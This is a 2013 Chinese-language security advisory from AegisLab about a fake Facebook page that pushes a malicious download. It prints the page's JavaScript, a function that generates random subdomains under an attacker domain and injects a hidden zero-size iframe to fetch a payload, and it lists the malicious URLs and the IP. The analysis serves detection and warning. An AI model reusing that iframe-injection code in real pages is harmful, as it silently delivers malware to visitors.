安全通報2013-06-17:新的Facebook病毒又來了,請小心!

AegisLab近日收到一使用者回報的malicious website:hxxp://sleepy.tw/hedvig.html!

點選進去後,會看到一個很像facebook的頁面,上面寫著引人注意的字:

"You need to download and execute the facebook app to see it!  It's amazing!"

然後即自動下載一個有問題的檔案!

1

 

可以看到其download的iframe URL:hxxp://vclcxe.best.volyn.ua/dlimage11.php?yx=alsy

download的檔案在VirusTotal的偵測率:20/47

而根據AegisLab的觀察,此download的URL有其規律性,且IP皆為91.204.162.106

'http://' + randomString(6) + '.best.volyn.ua/dlimage11.php?' + randomString(2) + '=' + randomString(4)

 

網頁裡的code可看到其iframe的規律:

function genDomain(){
  var sdom = 'http://' + randomString(6) + '.best.volyn.ua/dlimage11.php?' + randomString(
  2) + '=' + randomString(4);
  document.write('<iframe src="' + sdom + 
  '" width="0" height="0" frameborder="0"></iframe>');
}

 

2

(圖片來源:http://urlquery.net)

在urlquery搜尋"best.volyn.ua/dlimage11.php"此規則的URL,可以看到相當多的變化結果,

這些動態網域的產生,即是DGA(Domain Generation Algorithm)!

 

此頁面超過一段時間後,會自動把你導到:http://wickedreport.com(安全的網站)

window.setTimeout("document.location.href='http://wickedreport.com'", 120000)

 

AegisLab 已有相對應的signature可防護,提醒客戶隨時保持最新的signature以確保安全!

 

[2013.07.08 update]

此攻擊手法仍然存活,且陸續有新的malicious URL,並採取DGA方式,網域不斷的變換,經過AegisLab的觀察,這些malicious URL有2種規律性:

  1. 'http://' + randomString(6) + '.best.volyn.ua/dlimage11.php?' + randomString(2) + '=' + randomString(4)
  2. 'http://' + randomString(6) + '.best.lt.ua/dlimage4.php?' + randomString(2) + '=' + randomString(4)

截至2013.07.08 09:00為止,我們已經蒐集到了1355筆此2種規律的URL,AegisLab相對應的signature可安全防護,提醒客戶們隨時保持最新的signature,以確保安全!

 

發表迴響

你的電子郵件位址並不會被公開。 必要欄位標記為 *

*